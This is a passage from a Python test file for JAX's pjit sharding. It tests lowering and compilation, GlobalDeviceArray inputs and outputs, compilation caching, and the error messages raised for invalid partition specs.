in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
expected = x @ (x + 1)
lowered = f.lower(x, x + 1)
compiled = lowered.compile()
actual = compiled(x, x + 1)
self.assertEqual(lowered.in_avals, compiled.in_avals)
self.assertEqual(
lowered.in_avals,
((jax.ShapedArray(x.shape, x.dtype, weak_type=False),) * 2, {}))
splits = np.split(expected, 4)
self.assertAllClose(actual.device_buffers[0].to_py(), splits[0],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[1].to_py(), splits[1],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[2].to_py(), splits[2],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[3].to_py(), splits[3],
check_dtypes=False)
for obj in [lowered, compiled]:
self.assertTrue(obj._no_kwargs, True)
self.assertEqual(obj.in_tree, jax.tree_flatten(((0, 0), {}))[1])
  @jtu.with_mesh([('x', 2), ('y', 2)])
  def testLowerCompileWithKwargs(self):
    """Compiled pjit executables reject keyword arguments."""
    @partial(pjit,
             in_axis_resources=P(('x', 'y'),),
             out_axis_resources=P(('x', 'y'),))
    def f(x, y, **kwargs):
      return x @ y

    shape = (8, 8)
    x = jnp.arange(np.prod(shape)).reshape(shape)
    exe = f.lower(x, x + 1).compile()
    self.assertRaisesRegex(
        NotImplementedError,
        "function was compiled by a transformation that does not support "
        "keyword arguments, but called with keyword arguments: a, b",
        lambda: exe(x, x + 1, a=1, b=2))

  @jtu.with_mesh([('x', 2), ('y', 2)])
  def testLowerCompileInTreeMismatch(self):
    """Calling a compiled executable with a different pytree structure fails."""
    @partial(pjit,
             in_axis_resources=P(('x', 'y'),),
             out_axis_resources=P(('x', 'y'),))
    def f(x, y):
      return x @ y

    shape = (8, 8)
    x = jnp.arange(np.prod(shape)).reshape(shape)
    exe = f.lower(x, x + 1).compile()
    self.assertRaisesRegex(
        TypeError, "function compiled for .*, called with .*",
        lambda: exe([x], [x + 1]))

  @jtu.with_mesh([('x', 2), ('y', 2)])
  def testLowerCompileArgTypeMismatch(self):
    """Calling a compiled executable with mismatched dtypes fails."""
    @partial(pjit,
             in_axis_resources=P(('x', 'y'),),
             out_axis_resources=P(('x', 'y'),))
    def f(x, y):
      return x @ y

    shape = (8, 8)
    x = jnp.arange(np.prod(shape)).reshape(shape)
    x_f32 = x.astype(jnp.float32)
    x_i32 = x.astype(jnp.int32)
    exe = f.lower(x_f32, x_f32).compile()
    self.assertRaisesRegex(
        TypeError,
        "Computation compiled for input types:\n.*float32.*\n"
        "called with:\n.*int32.*",
        lambda: exe(x_i32, x_i32))

  @jtu.with_mesh([('x', 2), ('y', 2)])
  def testLowerCompilerIR(self):
    """lower() exposes compiler IR in both HLO and MHLO dialects."""
    @partial(pjit,
             in_axis_resources=P(('x', 'y'),),
             out_axis_resources=P(('x', 'y'),))
    def f(x, y):
      return x @ y

    shape = (8, 8)
    x = jnp.arange(np.prod(shape)).reshape(shape)
    f = f.lower(x, x + 1)
    self.assertIsNotNone(f.compiler_ir())
    self.assertIsNotNone(f.compiler_ir(dialect='hlo'))
    self.assertIsNotNone(f.compiler_ir(dialect='mhlo'))

  @jtu.with_mesh([('x', 2), ('y', 2)])
  def testLowerCompileCompilerIR(self):
    """compile() also exposes the post-compilation compiler IR."""
    @partial(pjit,
             in_axis_resources=P(('x', 'y'),),
             out_axis_resources=P(('x', 'y'),))
    def f(x, y):
      return x @ y

    shape = (8, 8)
    x = jnp.arange(np.prod(shape)).reshape(shape)
    f = f.lower(x, x + 1).compile()
    self.assertIsNotNone(f.compiler_ir())

  @jtu.with_mesh([('x', 2), ('y', 2)])
  def testLowerCompileExecutable(self):
    """compile() exposes the underlying runtime executable."""
    @partial(pjit,
             in_axis_resources=P(('x', 'y'),),
             out_axis_resources=P(('x', 'y'),))
    def f(x, y):
      return x @ y

    shape = (8, 8)
    x = jnp.arange(np.prod(shape)).reshape(shape)
    f = f.lower(x, x + 1).compile()
    self.assertIsNotNone(f.runtime_executable())

  @jtu.with_mesh([('x', 2)])
  def test_static_argnums(self):
    """static_argnums lets non-array Python values steer retracing."""
    @partial(pjit, in_axis_resources=None, out_axis_resources=None,
             static_argnums=(1,))
    def f(x, y):
      return x + (3 if y == 'hi' else 4)

    self.assertEqual(f(1, 'hi'), 4)
    self.assertEqual(f(1, 'bye'), 5)
class GDAPjitTest(jtu.JaxTestCase):
  """Tests for pjit with GlobalDeviceArray (GDA) inputs and outputs."""

  @jtu.with_mesh([('x', 4), ('y', 2)])
  def test_pjit_gda_single_output(self):
    """FROM_GDA input produces a GDA output; non-GDA input is rejected."""
    global_mesh = jtu.create_global_mesh((4, 2), ('x', 'y'))
    global_input_shape = (8, 2)
    mesh_axes = P('x', 'y')
    input_data = np.arange(
        prod(global_input_shape)).reshape(global_input_shape)
    def cb(index):
      return input_data[index]

    gda_obj = global_device_array.GlobalDeviceArray.from_callback(
        global_input_shape, global_mesh, mesh_axes, cb)

    with jax._src.config.parallel_functions_output_gda(True):
      @partial(pjit, in_axis_resources=FROM_GDA, out_axis_resources=P('x', 'y'))
      def f(x):
        return x @ x.T
      expected_matrix_mul = input_data @ input_data.T

      out = f(gda_obj)
      self.assertIsInstance(out, global_device_array.GlobalDeviceArray)
      self.assertEqual(out.shape, (8, 8))
      self.assertEqual(out.local_shards[0].data.shape, (2, 4))
      self.assertDictEqual(out.mesh.shape, {'x': 4, 'y': 2})
      for s in out.local_shards:
        self.assertArraysEqual(s.data, expected_matrix_mul[s.index])

      # Feeding a GDA output back in should also work.
      out2 = f(out)
      self.assertIsInstance(out2, global_device_array.GlobalDeviceArray)

      with self.assertRaisesRegex(
          ValueError, ('For a non-GDA input, the corresponding resource in '
                       'in_axis_resources cannot be `pjit.FROM_GDA`.')):
        f(input_data)

  def test_pjit_gda_single_output_with_mesh_context_manager(self):
    """Same as test_pjit_gda_single_output, but inside a `with mesh:` block."""
    global_mesh = jtu.create_global_mesh((4, 2), ('x', 'y'))
    global_input_shape = (8, 2)
    mesh_axes = P('x', 'y')
    input_data = np.arange(
        prod(global_input_shape)).reshape(global_input_shape)
    def cb(index):
      return input_data[index]

    gda_obj = global_device_array.GlobalDeviceArray.from_callback(
        global_input_shape, global_mesh, mesh_axes, cb)

    with jax._src.config.parallel_functions_output_gda(True):
      with global_mesh:
        @partial(pjit, in_axis_resources=FROM_GDA, out_axis_resources=P('x', 'y'))
        def f(x):
          return x @ x.T
        expected_matrix_mul = input_data @ input_data.T

        out = f(gda_obj)
        self.assertIsInstance(out, global_device_array.GlobalDeviceArray)
        self.assertEqual(out.shape, (8, 8))
        self.assertEqual(out.local_shards[0].data.shape, (2, 4))
        self.assertDictEqual(out.mesh.shape, {'x': 4, 'y': 2})
        for s in out.local_shards:
          self.assertArraysEqual(s.data, expected_matrix_mul[s.index])

        out2 = f(out)
        self.assertIsInstance(out2, global_device_array.GlobalDeviceArray)

        with self.assertRaisesRegex(
            ValueError, ('For a non-GDA input, the corresponding resource in '
                         'in_axis_resources cannot be `pjit.FROM_GDA`.')):
          f(input_data)
  @jtu.with_mesh([('x', 4), ('y', 2)])
  def test_pjit_gda_multi_input_multi_output(self):
    """Four GDA inputs with different specs; checks every output's shards."""
    global_mesh = jtu.create_global_mesh((4, 2), ('x', 'y'))
    global_input_shape = (8, 2)
    input_data = np.arange(
        prod(global_input_shape)).reshape(global_input_shape)
    def cb(index):
      return input_data[index]

    mesh_axes1 = P('x', 'y')
    gda1 = global_device_array.GlobalDeviceArray.from_callback(
        global_input_shape, global_mesh, mesh_axes1, cb)
    mesh_axes2 = P('x')
    gda2 = global_device_array.GlobalDeviceArray.from_callback(
        global_input_shape, global_mesh, mesh_axes2, cb)
    mesh_axes3 = P(('x', 'y'))
    gda3 = global_device_array.GlobalDeviceArray.from_callback(
        global_input_shape, global_mesh, mesh_axes3, cb)
    mesh_axes4 = P(None)
    gda4 = global_device_array.GlobalDeviceArray.from_callback(
        global_input_shape, global_mesh, mesh_axes4, cb)

    with jax._src.config.parallel_functions_output_gda(True):
      @partial(
          pjit,
          # `FROM_GDA` will be replicated for all the inputs.
          in_axis_resources=FROM_GDA,
          out_axis_resources=(mesh_axes1, mesh_axes4, mesh_axes2, mesh_axes3))
      def f(x, y, z, a):
        return x @ x.T, y, z, a
      out1, out2, out3, out4 = f(gda1, gda2, gda3, gda4)

      # out1: sharded ('x', 'y') -- fully partitioned, replica_id always 0.
      self.assertIsInstance(out1, global_device_array.GlobalDeviceArray)
      self.assertEqual(out1.shape, (8, 8))
      self.assertEqual(out1.local_shards[0].data.shape, (2, 4))
      self.assertEqual(out1.local_shards[0].index, (slice(0, 2), slice(0, 4)))
      self.assertEqual(out1.local_shards[1].index, (slice(0, 2), slice(4, 8)))
      self.assertListEqual([s.replica_id for s in out1.local_shards],
                           [0, 0, 0, 0, 0, 0, 0, 0])
      expected_matrix_mul = input_data @ input_data.T
      for s in out1.local_shards:
        self.assertArraysEqual(s.data, expected_matrix_mul[s.index])

      # out2: replicated (P(None)) -- every device holds the full array.
      self.assertIsInstance(out2, global_device_array.GlobalDeviceArray)
      self.assertEqual(out2.shape, (8, 2))
      self.assertEqual(out2.local_shards[0].data.shape, (8, 2))
      self.assertEqual(out2.local_shards[0].index, (slice(None), slice(None)))
      self.assertEqual(out2.local_shards[1].index, (slice(None), slice(None)))
      self.assertListEqual([s.replica_id for s in out2.local_shards],
                           [0, 1, 2, 3, 4, 5, 6, 7])
      for s in out2.local_shards:
        self.assertArraysEqual(s.data, input_data)

      # out3: sharded on 'x' only -- replicated across 'y' (2 replicas).
      self.assertIsInstance(out3, global_device_array.GlobalDeviceArray)
      self.assertEqual(out3.shape, (8, 2))
      self.assertEqual(out3.local_shards[0].data.shape, (2, 2))
      self.assertEqual(out3.local_shards[0].index, (slice(0, 2), slice(None)))
      self.assertEqual(out3.local_shards[1].index, (slice(0, 2), slice(None)))
      self.assertListEqual([s.replica_id for s in out3.local_shards],
                           [0, 1, 0, 1, 0, 1, 0, 1])
      for s in out3.local_shards:
        self.assertArraysEqual(s.data, input_data[s.index])

      # out4: sharded over the flattened ('x', 'y') axis -- 8-way row split.
      self.assertIsInstance(out4, global_device_array.GlobalDeviceArray)
      self.assertEqual(out4.shape, (8, 2))
      self.assertEqual(out4.local_shards[0].data.shape, (1, 2))
      self.assertEqual(out4.local_shards[0].index, (slice(0, 1), slice(None)))
      self.assertEqual(out4.local_shards[1].index, (slice(1, 2), slice(None)))
      self.assertListEqual([s.replica_id for s in out4.local_shards],
                           [0, 0, 0, 0, 0, 0, 0, 0])
      for s in out4.local_shards:
        self.assertArraysEqual(s.data, input_data[s.index])
  @jtu.with_mesh([('x', 4), ('y', 2)])
  def test_pjit_gda_mixed_inputs(self):
    """Mixing a GDA input (FROM_GDA) with a plain ndarray input."""
    global_mesh = jtu.create_global_mesh((4, 2), ('x', 'y'))
    global_input_shape = (8, 2)
    mesh_axes = P('x', 'y')
    input_data = np.arange(
        prod(global_input_shape)).reshape(global_input_shape)
    def cb(index):
      return input_data[index]

    gda_obj = global_device_array.GlobalDeviceArray.from_callback(
        global_input_shape, global_mesh, mesh_axes, cb)

    with jax._src.config.parallel_functions_output_gda(True):
      @partial(pjit,
               in_axis_resources=(FROM_GDA, P('x', 'y')),
               out_axis_resources=(P('x', 'y'), P(('x', 'y'))))
      def f(x, y):
        return x @ x.T, y @ y.T
      expected_matrix_mul = input_data @ input_data.T

      out1, out2 = f(gda_obj, input_data)
      self.assertIsInstance(out1, global_device_array.GlobalDeviceArray)
      self.assertEqual(out1.shape, (8, 8))
      self.assertEqual(out1.local_shards[0].data.shape, (2, 4))
      self.assertDictEqual(out1.mesh.shape, {'x': 4, 'y': 2})
      for s in out1.local_shards:
        self.assertArraysEqual(s.data, expected_matrix_mul[s.index])

      self.assertIsInstance(out2, global_device_array.GlobalDeviceArray)
      self.assertEqual(out2.shape, (8, 8))
      self.assertEqual(out2.local_shards[0].data.shape, (1, 8))
      self.assertDictEqual(out2.mesh.shape, {'x': 4, 'y': 2})
      for s in out2.local_shards:
        self.assertArraysEqual(s.data, expected_matrix_mul[s.index])

  @jtu.with_mesh([('x', 4), ('y', 2)])
  def test_pjit_gda_non_gda_inputs(self):
    """GDA outputs are produced even when every input is a plain ndarray."""
    input_shape = (8, 2)
    input_data = np.arange(prod(input_shape)).reshape(input_shape)

    with jax._src.config.parallel_functions_output_gda(True):
      @partial(pjit,
               in_axis_resources=(None, P('x', 'y')),
               out_axis_resources=(P('x', 'y'), P(('x', 'y'))))
      def f(x, y):
        return x @ x.T, y @ y.T

      expected_matrix_mul = input_data @ input_data.T
      out1, out2 = f(input_data, input_data)

      self.assertIsInstance(out1, global_device_array.GlobalDeviceArray)
      self.assertEqual(out1.shape, (8, 8))
      self.assertEqual(out1.local_shards[0].data.shape, (2, 4))
      self.assertDictEqual(out1.mesh.shape, {'x': 4, 'y': 2})
      for s in out1.local_shards:
        self.assertArraysEqual(s.data, expected_matrix_mul[s.index])

      self.assertIsInstance(out2, global_device_array.GlobalDeviceArray)
      self.assertEqual(out2.shape, (8, 8))
      self.assertEqual(out2.local_shards[0].data.shape, (1, 8))
      self.assertDictEqual(out2.mesh.shape, {'x': 4, 'y': 2})
      for s in out2.local_shards:
        self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
@jtu.with_mesh([('x', 2), ('y', 2)])
def test_pjit_gda_mesh_mismatch(self):
# A GDA built on a 4x2 mesh is fed to a pjit running under the 2x2 mesh
# installed by the decorator above; pjit must reject the mesh mismatch.
global_mesh = jtu.create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = P('x', 'y')
global_input_data = np.arange(
prod(global_input_shape), dtype=np.float32).reshape(global_input_shape)
# Callback that materializes the local shard for a given global index.
def cb(index):
return global_input_data[index]
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes, cb)
with self.assertRaisesRegex(ValueError,
"Pjit's mesh and GDA's mesh should be equal."):
@partial(pjit, in_axis_resources=FROM_GDA, out_axis_resources=P('x', 'y'))
def f(x):
return x
f(gda_obj)
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_wrong_resource_for_gda_input(self):
global_mesh = jtu.create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = P('x')
global_input_data = np.arange(
prod(global_input_shape), dtype=np.float32).reshape(global_input_shape)
def cb(index):
return global_input_data[index]
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes, cb)
with self.assertRaisesWithLiteralMatch(
ValueError,
"Got an input GDA to pjit with different partitioning than specified "
'in the in_axis_resources argument to pjit. The partitioning must '
'match, or use `jax.experimental.pjit.FROM_GDA` in `in_axis_resources`. '
"Got GDA spec: PartitionSpec('x',) and "
"pjit spec: PartitionSpec('x', 'y') "
'for GDA: GlobalDeviceArray(shape=(8, 2), dtype=float32)'):
@partial(pjit, in_axis_resources=P('x', 'y'), out_axis_resources=P('x', 'y'))
def f(x):
return x
f(gda_obj)
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_caching(self):
global_mesh = jtu.create_global_mesh((4, 2), ('x', 'y'))
input_shape = (8, 2)
mesh_axes = P('x', 'y')
input_data = np.arange(
prod(input_shape), dtype=np.float32).reshape(input_shape)
def cb(index):
return input_data[index]
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
input_shape, global_mesh, mesh_axes, cb)
@partial(pjit, in_axis_resources=mesh_axes, out_axis_resources=P('x', 'y'))
def f(x, y):
return x @ y.T
before_lower_cache = pjit_lib._pjit_lower.cache_info()
f(gda_obj, gda_obj)
after_lower_cache1 = pjit_lib._pjit_lower.cache_info()
self.assertEqual(before_lower_cache.hits, after_lower_cache1.hits)
self.assertEqual(before_lower_cache.misses + 1, after_lower_cache1.misses)
f(gda_obj, gda_obj)
after_lower_cache2 = pjit_lib._pjit_lower.cache_info()
self.assertEqual(after_lower_cache1.hits + 1, after_lower_cache2.hits)
self.assertEqual(after_lower_cache1.misses, after_lower_cache2.misses)
f(input_data, input_data)
after_lower_cache3 = pjit_lib._pjit_lower.cache_info()
self.assertEqual(after_lower_cache2.hits, after_lower_cache3.hits)
self.assertEqual(after_lower_cache2.misses + 1, after_lower_cache3.misses)
f(gda_obj, input_data)
after_lower_cache4 = pjit_lib._pjit_lower.cache_info()
self.assertEqual(after_lower_cache3.hits, after_lower_cache4.hits)
self.assertEqual(after_lower_cache3.misses + 1, after_lower_cache4.misses)
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_partition_spec_mismatch_semantically_equivalent(self):
global_mesh = jtu.create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = P(None)
global_input_data = np.arange(
prod(global_input_shape), dtype=np.float32).reshape(global_input_shape)
def cb(index):
return global_input_data[index]
with jax._src.config.parallel_functions_output_gda(True):
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes, cb)
@partial(pjit, in_axis_resources=P(None), out_axis_resources=P(None))
def f(x):
return x
output_gda = f(gda_obj)
# Ensure output_gda.mesh_axes = P() is matched with P(None).
self.assertEqual(output_gda.mesh_axes, ())
# P(None) is in_axis_resources.
f(output_gda)
def test_from_gda_duplicates(self):
# Regression test: a second, distinct FROM_GDA singleton instance must be
# accepted by pjit's in_axis_resources instead of raising.
global_mesh = jtu.create_global_mesh((1, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = P('x', 'y')
input_gda = create_gda(global_input_shape, global_mesh, mesh_axes)
# It's occasionally possible to end up with two FROM_GDA singletons (e.g. if
# pickling in_axis_resources and sending to other processes). Make sure
# this doesn't cause an error to avoid user confusion.
from_gda_dup = pjit_lib._FromGdaSingleton()
with maps.Mesh(global_mesh.devices, global_mesh.axis_names):
pjit(lambda x: x, in_axis_resources=from_gda_dup, out_axis_resources=None)(
input_gda)
def test_no_recompilation_due_to_in_axis_resources(self):
# A GDA whose axes normalize to the empty spec () must hit the lowering
# cache when fed back into a pjit declared with the equivalent P(None,).
global_mesh = jtu.create_global_mesh((1, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = P(None,)
input_gda = create_gda(global_input_shape, global_mesh, mesh_axes)
with jax._src.config.parallel_functions_output_gda(True):
@partial(pjit, in_axis_resources=mesh_axes, out_axis_resources=mesh_axes)
def f(x):
return x
with global_mesh:
out_gda = f(input_gda)
# Output spec is normalized to the empty tuple even though P(None,) was given.
self.assertEqual(out_gda.mesh_axes, ())
# Second call with the output GDA: one new cache hit, zero new misses,
# i.e. no recompilation happened.
before_cache = pjit_lib._pjit_lower.cache_info()
f(out_gda)
after_cache = pjit_lib._pjit_lower.cache_info()
self.assertEqual(before_cache.hits + 1, after_cache.hits)
self.assertEqual(before_cache.misses, after_cache.misses)
def test_no_recompilation_due_to_fully_replicated_and_gda_inputs(self):
# A plain numpy input produces a fully replicated output GDA
# (mesh_axes == ()); feeding that GDA back into the same pjit with
# in_axis_resources=P(None) must be a lowering-cache hit (no recompile).
global_mesh = jtu.create_global_mesh((1, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = P(None)
global_data = np.arange(
prod(global_input_shape)).reshape(global_input_shape)
with jax._src.config.parallel_functions_output_gda(True):
f = pjit(lambda x: x, in_axis_resources=mesh_axes,
out_axis_resources=mesh_axes)
with global_mesh:
out_gda = f(global_data)
self.assertEqual(out_gda.mesh_axes, ())
# Second call: exactly one new hit and no new miss on the lowering cache.
before_cache = pjit_lib._pjit_lower.cache_info()
f(out_gda)
after_cache = pjit_lib._pjit_lower.cache_info()
self.assertEqual(before_cache.hits + 1, after_cache.hits)
self.assertEqual(before_cache.misses, after_cache.misses)
def spec_regex(s):
    """Return str(s) with literal parentheses backslash-escaped.

    Used to embed a PartitionSpec's repr inside a regular expression
    without its parentheses being treated as regex groups.  Only '(' and
    ')' are escaped (re.escape would escape more and change the output).
    """
    escaped = str(s)
    for ch in ("(", ")"):
        escaped = escaped.replace(ch, "\\" + ch)
    return escaped
class PJitErrorTest(jtu.JaxTestCase):
@check_1d_2d_mesh(set_mesh=True)
def testNonDivisibleArgs(self, mesh, resources):
x = jnp.ones((3, 2))
spec = P(resources, None)
mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
with self.assertRaisesRegex(ValueError,
r"One of pjit arguments.*" + spec_regex(spec) + r".*"
r"implies that the size of its dimension 0 should be "
r"divisible by " + mesh_size + r", but it is equal to 3"):
pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)
@check_1d_2d_mesh(set_mesh=True)
def testNonDivisibleOuts(self, mesh, resources):
x = jnp.ones((3, 2))
spec = P(resources, None)
mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
with self.assertRaisesRegex(ValueError,
r"One of pjit outputs.*" + spec_regex(spec) + r".*"
r"implies that the size of its dimension 0 should be "
r"divisible by " + mesh_size + r", but it is equal to 3"):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=P(resources, None))(x)
@check_1d_2d_mesh(set_mesh=False)
@jtu.with_mesh([('z', 1)])
def testUndefinedResourcesArgs(self, mesh, resources):
x = jnp.ones((2, 2))
spec = P(resources,)
with self.assertRaisesRegex(ValueError,
r"One of pjit arguments.*" + spec_regex(spec) + r", "
r"but resource axis x is undefined."):
pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)
@check_1d_2d_mesh(set_mesh=False)
@jtu.with_mesh([('z', 1)])
def testUndefinedResourcesOuts(self, mesh, resources):
x = jnp.ones((2, 2))
spec = P(resources,)
with self.assertRaisesRegex(ValueError,
r"One of pjit outputs.*" + spec_regex(spec) + r", "
r"but resource axis x is undefined."):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=spec)(x)
@check_1d_2d_mesh(set_mesh=False)
@jtu.with_mesh([('z', 1)])
def testUndefinedResourcesConstraint(self, mesh, resources):
x = jnp.ones((2, 2))
spec = P(resources,)
with self.assertRaisesRegex(ValueError,
r"One of with_sharding_constraint arguments"
r".*" + spec_regex(spec) + r", but resource axis "
r"x is undefined."):
pjit(lambda x: with_sharding_constraint(x, spec),
in_axis_resources=None, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowArgs(self):
x = jnp.arange(2)
spec = P('x', 'y')
error = (r"One of pjit arguments.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 1")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x.sum(), in_axis_resources=spec, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowArgsAxisResourcesNone(self):
x = jnp.arange(2)
spec = P(None, None)
error = (r"One of pjit arguments.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 1")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x.sum(), in_axis_resources=spec, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowOuts(self):
x = jnp.arange(2)
spec = P('x', 'y')
error = (r"One of pjit outputs.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 0")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x.sum(), in_axis_resources=None, out_axis_resources=spec)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowConstraint(self):
x = jnp.arange(2)
spec = P('x', 'y')
error = (r"One of with_sharding_constraint arguments " +
r"was given.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 1")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: with_sharding_constraint(x, spec),
in_axis_resources=None, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRepeatedInResources(self):
x = jnp.arange(2)
for spec in [P('x', 'x'), P('x', ('y', 'x'))]:
error = (r"A single in_axis_resources specification can map every mesh "
r"axis to at most one positional dimension, but " +
spec_regex(spec) + " has duplicate entries for `x`")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRepeatedOutResources(self):
x = jnp.arange(2)
for spec in [P('x', 'x'), P('x', ('y', 'x'))]:
error = (r"A single out_axis_resources specification can map every mesh "
r"axis to at most one positional dimension, but " +
spec_regex(spec) + " has duplicate entries for `x`")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=spec)(x)
@jtu.with_mesh([('x', 2)])
def testInputShardsXMapAxis(self):
spec = P('x')
f = xmap(pjit(lambda x: x + 2, in_axis_resources=spec, out_axis_resources=None),
in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
x = jnp.arange(4).reshape((2, 2))
error = (r"pjit input has an axis resources specification of " +
spec_regex(spec) + r" that uses one or more mesh axes already used by "
r"xmap to partition a named axis appearing in its named_shape \(both "
r"use mesh axes `x`\)")
with self.assertRaisesRegex(JAXTypeError, error):
f(x)
@jtu.with_mesh([('x', 2)])
def testOutputShardsXMapAxis(self):
spec = P('x')
f = xmap(pjit(lambda x: x + 2, in_axis_resources=None, out_axis_resources=spec),
in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
x = jnp.arange(4).reshape((2, 2))
error = (r"pjit output has an axis resources specification of " +
spec_regex(spec) + r" that uses one or more mesh axes already used by "
r"xmap to partition a named axis appearing in its named_shape \(both "
r"use mesh axes `x`\)")
with self.assertRaisesRegex(JAXTypeError, error):
f(x)
@jtu.with_mesh([('x', 2)])
def testConstraintShardsXMapAxis(self):
spec = P('x')
f = xmap(lambda x: with_sharding_constraint(x, axis_resources=spec),
in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
x = jnp.arange(4).reshape((2, 2))
error = (r"with_sharding_constraint input has an axis resources specification of " +
spec_regex(spec) + r" that uses one or more mesh axes already used by "
r"xmap to partition a named axis appearing in its named_shape \(both "
r"use mesh axes `x`\)")
with self.assertRaisesRegex(JAXTypeError, error):
f(x)
@jtu.with_mesh([('x', 2)])
def testCatchesInnerXMapErrors(self):
f = pjit(xmap(lambda x, y: x, in_axes=(['i'], ['j']), out_axes=['i', 'j'],
axis_resources={'i': 'x', 'j': 'x'}),
in_axis_resources=None, out_axis_resources=None)
x = jnp.arange(4)
with self.assertRaises(JAXTypeError):
f(x, x)
def testEmptyMesh(self):
error = (r"pjit requires a non-empty mesh! Are you sure that it's defined "
r"at the call site?")
with self.assertRaisesRegex(RuntimeError, error):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=None)(jnp.arange(4))
@jtu.with_mesh([('x', 2)])
def testAxisResourcesMismatch(self):
x = jnp.ones([])
p = [None, None, None]
pjit(lambda x: x, (p,), p)([x, x, x]) # OK
error = re.escape(
"pjit in_axis_resources specification must be a tree prefix of the "
"positional arguments tuple passed to the `pjit`-decorated function. "
"In particular, pjit in_axis_resources must either be a None, a "
"PartitionSpec, or a tuple of length equal to the number of positional "
"arguments. But pjit in_axis_resources is the wrong length: got a "
"tuple or list of length 3 for an args tuple of length 2.")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x, y: x, p, p)(x, x)
Foo = namedtuple('Foo', ['x'])
error = "in_axis_resources is not a tuple.*might need to be wrapped"
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x, Foo(None), Foo(None))(Foo(x))
pjit(lambda x: x, (Foo(None),), Foo(None))(Foo(x)) # OK w/ singleton tuple
# TODO(apaszke,mattjj): Disable implicit list casts and enable this
# error = ("it looks like pjit in_axis_resources might need to be wrapped in "
# "a singleton tuple.")
# with self.assertRaisesRegex(ValueError, error):
# pjit(lambda x, y: x, p, p)([x, x, x])
# TODO(apaszke): Disable implicit list casts and enable this
# error = re.escape(
# r"pjit in_axis_resources specification must be a tree prefix of the "
# r"corresponding value, got specification (None, None, None) for value "
# r"tree PyTreeDef(([*, *, *],)). Note that pjit in_axis_resources that "
# r"are non-trivial pytrees should always be wrapped in a tuple representing "
# r"the argument list. In particular, you're passing in a single argument "
# r"which means that pjit in_axis_resources might need to be wrapped in a "
# r"singleton tuple.")
# with self.assertRaisesRegex(ValueError, error):
# pjit(lambda x: x, p, p)([x, x, x]) # Error, but make sure we hint at singleton tuple
error = re.escape(
"pytree structure error: different numbers of pytree children at "
"key path\n"
" pjit out_axis_resources tree root\n"
"At that key path, the prefix pytree pjit out_axis_resources has a "
"subtree of type\n"
" <class 'list'>\n"
"with 2 children, but at the same key path the full pytree has a "
"subtree of the same type but with 3 children.")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x, (p,), [p, None])([x, x, x]) # Error, we raise a generic tree mismatch message
@jtu.with_mesh([('x', 2)])
def testNestedDifferentResources(self):
@partial(pjit, in_axis_resources=P('x'), out_axis_resources=None)
def f(x):
with maps.Mesh(np.array([jax.local_devices()[0]]), ('x')):
@partial(pjit, in_axis_resources=P('x'), out_axis_resources=None)
def h(x):
return x
return h(x)
xshape = (2, 5, 6)
x = jnp.arange(np.prod(xshape)).reshape(xshape)
with self.assertRaisesRegex(RuntimeError,
"Changing the physical mesh is not allowed.*"):
f(x)
class UtilTest(jtu.JaxTestCase):
def testOpShardingRoundTrip(self):
FakeDevice = namedtuple('FakeDevice', ['id'])
mesh_named_shape = OrderedDict([('a', 2), ('b', 3), ('c', 4), ('d', 7), ('e', 4)])
mesh_axes, mesh_shape = unzip2(mesh_named_shape.items())
devices = [FakeDevice(i) for i in range(np.prod(list(mesh_shape)))]
mesh = pxla.Mesh(np.array(devices).reshape(*mesh_shape), tuple(mesh_axes))
